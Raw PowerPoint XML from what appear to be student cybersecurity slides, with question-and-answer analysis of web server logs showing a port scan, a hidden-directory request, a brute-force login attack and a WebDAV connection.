          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>What time did the port scan occur? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>April 22, 2021 15:39:10</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>How many packets were sent, and from which IP? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>1000</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>What indicates that this was a port scan? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>Multiple requests to multiple ports from one IP address (192.168.1.8) with no connection, within a few seconds of each other. User Agent: with Nmap scripting Engine</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90A8F20B-7A1F-4A8A-AD72-7CE263E595B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="6086" t="77005" r="4451" b="5240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="213725" y="1959120"/>
            <a:ext cx="6322695" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC675373-78CF-4AF0-9978-448DEEA6C340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="29402" t="51673" r="12478" b="35057"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="213725" y="2677515"/>
            <a:ext cx="3452495" cy="442595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D162548-CC47-441B-9CDC-55384793CDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="25939" r="7577" b="7965"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3666220" y="2663970"/>
            <a:ext cx="4956805" cy="1916816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>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168"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p66"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Google Shape;1170;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="4114800" cy="1269600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p66"/>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172" name="Google Shape;1172;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1851872"/>
            <a:ext cx="8409300" cy="2000027"/>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Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>What time did the request occur? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>April 21, 2021 15:41:34</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t> How many requests were made? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>4 requests</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>Which files were requested? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>company_folders/secret_folder/connect_to_corp_server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>What did they contain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>? Instructions on how to connect to the server and CEO Ryan’s hashed password</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0FC4E4F-2D66-49AB-8A7A-1DC062851D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="4597" t="65971" r="8054" b="15043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="337847" y="1926714"/>
            <a:ext cx="4351111" cy="645036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C915FD20-42A6-4BC1-9C0A-CA04200D8809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857881" y="1920600"/>
            <a:ext cx="3749845" cy="1339199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EA23F8-0772-4FCF-896D-832BADAB0CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="19412" t="63114" r="13037" b="24641"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="367349" y="2888897"/>
            <a:ext cx="4321609" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:ex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178"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p6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Analysis: Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="4114800" cy="1269600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p67"/>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182" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1713000"/>
            <a:ext cx="8409300" cy="2138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Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>How many requests were made in the attack? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>23,528, multiple failed attempts were logged.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>How many requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>discovered the password? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>23,527</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF8AE89-C9FE-4015-BABB-9D765E9218E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="58003"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4467150" y="1945575"/>
            <a:ext cx="4324500" cy="1517550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF8AE89-C9FE-4015-BABB-9D765E9218E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="51846"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="367350" y="1920600"/>
            <a:ext cx="4114800" cy="1542525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>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188"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p68"/>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Analysis: Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="4114800" cy="1269600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p68"/>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192" name="Google Shape;1192;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384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Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>How many requests were made to this directory? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Which files were requested? ?company_folders/secret_folder/connect_to_corp_server</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
